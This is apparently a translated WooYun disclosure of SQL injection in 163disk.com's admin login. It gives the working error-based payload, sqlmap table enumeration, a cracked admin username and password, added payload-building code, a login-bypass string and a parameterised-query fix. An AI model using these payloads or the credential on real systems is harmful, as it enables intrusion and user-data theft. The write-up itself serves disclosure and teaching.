
163 Netdisk (163disk.com): POST injection on one of its sites (leaks 500,000 user records / 2,000,000 user files)

2015-09-21 06:15

Site: http://admin.houtai.163disk.com/index.php

The username parameter of the login form is injectable.

sqlmap output:

sqlmap identified the following injection points with a total of 96 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 2388 FROM(SELECT COUNT(*),CONCAT(0x716e616271,(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END)),0x7177656271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MOFa'='MOFa&password=admin&seccode=xwvv&submit=%B5%C7 %C2%BC
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] 163diskcom
[*] information_schema
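What the error-based payload above is actually doing, and how sqlmap reads the leaked value back out of MySQL's duplicate-key error, as an added example (my code, not part of the original WooYun report). The two hex marker literals are taken from the payload on the page; the login query shape and the error message text are constructed assumptions, since neither the site's PHP nor a raw server response is shown.

```python
"""Decoding sqlmap's MySQL error-based payload (added example, not from the report)."""
import re
from typing import Optional

# The two hex literals in the payload are sqlmap's marker strings; it wraps the
# value it wants to read between them so it can find it in the error message.
PREFIX = bytes.fromhex("716e616271").decode()   # 'qnabq'
SUFFIX = bytes.fromhex("7177656271").decode()   # 'qwebq'


def vulnerable_login_query(username: str, password: str) -> str:
    """Assumed shape of the 163disk admin login query (the real SQL is not on the
    page): user input is concatenated straight into the WHERE clause."""
    return ("SELECT * FROM disk_all_admin WHERE username='" + username +
            "' AND password='" + password + "'")


def error_based_payload(subquery: str) -> str:
    """Rebuild the page's payload around an arbitrary scalar subquery.

    RAND(0) is seeded, so FLOOR(RAND(0)*2) yields the fixed sequence 0,1,1,0,1,1,...
    Grouping COUNT(*) by CONCAT(marker, value, marker, that digit) over a table
    with a handful of rows (INFORMATION_SCHEMA.CHARACTER_SETS) makes MySQL try to
    insert the same group key twice into its temporary table and fail with
    "Duplicate entry '<key>' for key 'group_key'", so <key> leaks in the error.
    The leading admin' closes the original quoted literal; the trailing
    'MOFa'='MOFa re-balances the quotes so the statement still parses.
    """
    return ("admin' AND (SELECT 2388 FROM(SELECT COUNT(*),CONCAT(0x"
            + PREFIX.encode().hex() + ",(" + subquery + "),0x"
            + SUFFIX.encode().hex() + ",FLOOR(RAND(0)*2))x "
            "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MOFa'='MOFa")


def extract_leaked_value(mysql_error: str) -> Optional[str]:
    """Recover the value smuggled between the markers from the error text.
    The trailing FLOOR() digit sits after the suffix and is ignored."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), mysql_error)
    return m.group(1) if m else None


# The page's own payload is the boolean probe sqlmap sends first: "does 2388=2388".
PAGE_PAYLOAD = error_based_payload("SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END)")

# A later step reads real data, e.g. an admin user name. Constructed error text,
# modelled on MySQL's wording; no server was queried for this example.
SAMPLE_ERROR = "Duplicate entry 'qnabqwangmingqwebq1' for key 'group_key'"

if __name__ == "__main__":
    print(vulnerable_login_query(PAGE_PAYLOAD, "admin"))
    print(extract_leaked_value(SAMPLE_ERROR))
```

Once the probe confirms that the error text carries the markers, sqlmap swaps the CASE expression for subqueries against INFORMATION_SCHEMA and then the target tables, which is how the database list, table list and row counts shown below were produced without any blind guessing.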



Second run, resumed from the saved sqlmap session (hence 0 new HTTP requests), enumerating the 163diskcom database:

Database: 163diskcom
[21 tables]
+---------------------+
| disk_all_admin      |
| disk_all_adminlog   |
| disk_all_album      |
| disk_all_badword    |
| disk_all_config     |
| disk_all_help       |
| disk_all_hotso      |
| disk_all_links      |
| disk_all_list       |
| disk_all_notice     |
| disk_all_server     |
| disk_all_smtp       |
| disk_user_disk      |
| disk_user_feedback  |
| disk_user_file      |
| disk_user_filebody  |
| disk_user_filecount |
| disk_user_folder    |
| disk_user_info      |
| disk_user_login     |
| disk_user_msg       |
+---------------------+



Database: 163diskcom (row counts; the reporter's annotations are in the Note column)
+---------------------+---------+-------------+
| Table               | Entries | Note        |
+---------------------+---------+-------------+
| disk_user_filecount | 2025746 |             |
| disk_user_filebody  | 2025700 |             |
| disk_user_file      | 2025639 | file table  |
| disk_user_disk      |  522093 | user table  |
| disk_user_info      |  522036 |             |
| disk_user_login     |  144237 |             |
| disk_user_folder    |   74119 |             |
| disk_user_msg       |   71211 |             |
| disk_user_feedback  |   16169 |             |
| disk_all_adminlog   |    1549 |             |
| disk_all_badword    |    1231 |             |
| disk_all_album      |     136 |             |
| disk_all_links      |     110 |             |
| disk_all_notice     |      14 |             |
| disk_all_server     |      10 |             |
| disk_all_hotso      |       8 |             |
| disk_all_list       |       8 |             |
| disk_all_smtp       |       6 |             |
| disk_all_admin      |       3 | admin table |
| disk_all_config     |       1 |             |
+---------------------+---------+-------------+



[Screenshot: 1111.png]

Retrieved the administrator account wangming; its password hash cracked to wang_2014.

Logged into the backend.

[Screenshots: 2222.png, 3333.png, 4444.png]

Proof of vulnerability: the same four screenshots, 1111.png to 4444.png.

Fix:

Filter input. In practice that means issuing the login lookup as a prepared statement with bound parameters rather than escaping or blacklisting characters: the form posts GBK (the submit value %B5%C7%C2%BC is GBK for 登录), and escaping-based filters on multibyte input are a known weak point. Since the dumped admin hash cracked straight to a password, admin credentials should also be stored with a salted, slow hash, and the backend should not be reachable from the public internet.
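The vulnerable pattern and the bound-parameter fix side by side, as an added example (my code, not the 163disk code base, whose PHP is not on the page), run against an in-memory SQLite table standing in for disk_all_admin. The quote-breaking input uses the same trick as the sqlmap payload; the unsalted MD5 storage is a constructed assumption that mirrors how cheaply the admin hash was cracked and is not a recommendation.

```python
"""Login lookup: string concatenation vs. bound parameters (added example)."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Stand-in for the disk_all_admin table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE disk_all_admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO disk_all_admin VALUES (?, ?)",
                 ("wangming", hashlib.md5(b"wang_2014").hexdigest()))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The bug class from the report: username is pasted into the SQL text, so a
    single quote ends the literal and the rest of the input is parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT COUNT(*) FROM disk_all_admin WHERE username='" + username +
           "' AND password='" + pw_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: the SQL text is constant and the values travel as bound parameters,
    so a quote in the username is just a character in a string comparison."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT COUNT(*) FROM disk_all_admin WHERE username=? AND password=?",
        (username, pw_hash)).fetchone()
    return row[0] > 0


# Constructed attacker input: close the quote, then comment out the password check.
BYPASS = "wangming' -- "

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS, "anything"))   # password never checked
    print(login_fixed(db, BYPASS, "anything"))
    print(login_fixed(db, "wangming", "wang_2014"))
```

With bound parameters the attacker-controlled text never reaches the SQL parser, which also removes the error-based channel the report used: there is no injected CONCAT/GROUP BY to trigger a duplicate-key error, so nothing is echoed back.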


Source: www.wooyun.org/bugs/wooyun-2015-0130854

Reads: 139263 | Comments: 0 | Tags: injection
